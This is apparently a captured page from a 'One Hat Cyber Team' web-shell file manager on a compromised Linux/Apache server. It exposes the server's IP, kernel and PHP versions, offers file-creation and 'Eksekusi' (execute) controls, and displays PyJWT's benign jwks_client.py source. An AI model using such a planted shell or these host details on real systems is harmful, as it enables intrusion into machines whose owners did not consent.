⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.146
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
snap
/
core22
/
1963
/
lib
/
python3
/
dist-packages
/
jwt
/
View File Name :
jwks_client.py
import json import urllib.request from functools import lru_cache from typing import Any, List from .api_jwk import PyJWK, PyJWKSet from .api_jwt import decode_complete as decode_token from .exceptions import PyJWKClientError class PyJWKClient: def __init__(self, uri: str, cache_keys: bool = True, max_cached_keys: int = 16): self.uri = uri if cache_keys: # Cache signing keys # Ignore mypy (https://github.com/python/mypy/issues/2427) self.get_signing_key = lru_cache(maxsize=max_cached_keys)(self.get_signing_key) # type: ignore def fetch_data(self) -> Any: with urllib.request.urlopen(self.uri) as response: return json.load(response) def get_jwk_set(self) -> PyJWKSet: data = self.fetch_data() return PyJWKSet.from_dict(data) def get_signing_keys(self) -> List[PyJWK]: jwk_set = self.get_jwk_set() signing_keys = [ jwk_set_key for jwk_set_key in jwk_set.keys if jwk_set_key.public_key_use in ["sig", None] and jwk_set_key.key_id ] if not signing_keys: raise PyJWKClientError("The JWKS endpoint did not contain any signing keys") return signing_keys def get_signing_key(self, kid: str) -> PyJWK: signing_keys = self.get_signing_keys() signing_key = None for key in signing_keys: if key.key_id == kid: signing_key = key break if not signing_key: raise PyJWKClientError( f'Unable to find a signing key that matches: "{kid}"' ) return signing_key def get_signing_key_from_jwt(self, token: str) -> PyJWK: unverified = decode_token(token, options={"verify_signature": False}) header = unverified["header"] return self.get_signing_key(header.get("kid"))